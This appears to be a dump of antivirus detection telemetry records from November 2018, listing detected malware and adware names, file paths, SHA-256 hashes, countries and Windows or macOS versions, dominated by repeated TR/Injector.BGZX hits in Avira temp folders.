  Row(detection=Row(filename='avscan-20181102-051617-658411cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051617-658411CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051316-f96683de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051316-F96683DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052410-7fc6e9e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052410-7FC6E9E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060855-bfadd25e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060855-BFADD25E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055512-d51127a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055512-D51127A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054518-73256093', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054518-73256093', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052758-073ced55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052758-073CED55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054934-0c1df5ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054934-0C1DF5EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061736-f6b32760', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061736-F6B32760', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051603-5d6fdccc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051603-5D6FDCCC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052629-d29c21b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052629-D29C21B9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061957-4a3b1e28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061957-4A3B1E28', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060056-a21a3fb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060056-A21A3FB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051620-672c0a93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051620-672C0A93', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062637-38aa27db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062637-38AA27DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060859-c253cecb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060859-C253CECB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061016-f0571fa0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061016-F0571FA0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054037-cb95ec59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054037-CB95EC59', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062521-0ba55da0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062521-0BA55DA0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052811-0f70fa08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052811-0F70FA08', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050417-b879af67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050417-B879AF67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061759-044835ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061759-044835AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061705-e3e15daa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061705-E3E15DAA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050619-01329b8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050619-01329B8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055421-b6f52f8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055421-B6F52F8D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054437-5af87033', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054437-5AF87033', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054449-61ccbb94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054449-61CCBB94', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050642-0ed9a91a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050642-0ED9A91A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055424-b8d06dab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055424-B8D06DAB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050627-05a59f0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050627-05A59F0A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T18:33:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060112-ac2c6d8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060112-AC2C6D8D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055106-42e45962', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055106-42E45962', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050811-44127dbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050811-44127DBC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050551-f09eadbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050551-F09EADBC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:17:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054143-f309a579', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054143-F309A579', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055851-57a4602e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055851-57A4602E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062107-7415648d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062107-7415648D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054122-e69e4660', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054122-E69E4660', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051731-91e29d0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051731-91E29D0A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055940-751aa5c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055940-751AA5C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T19:09:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051113-b0697e57', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051113-B0697E57', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212941-812785a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_19e2935b\\AVSCAN-20181102-212415-53B6D721\\AVSCAN-20181102-212941-812785A2', filesize=2496000, name='Adware/Wajam.deane.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:29:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:43:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T18:08:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-28T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpavgio.dll\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-01T18:12:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:31:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1f6b762cfcd896d4b3a1ee42ddcd70fdf5fede4a3b5b6dac0a119dae0df9ab3a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1F6B762CFCD896D4B3A1EE42DDCD70FDF5FEDE4A3B5B6DAC0A119DAE0DF9AB3A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1f6b762cfcd896d4b3a1ee42ddcd70fdf5fede4a3b5b6dac0a119dae0df9ab3a', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:25:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fd.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\FD\\FD.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\C:\\Windows\\system32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:21Z'), dt=datetime.date(2018, 11, 1)),
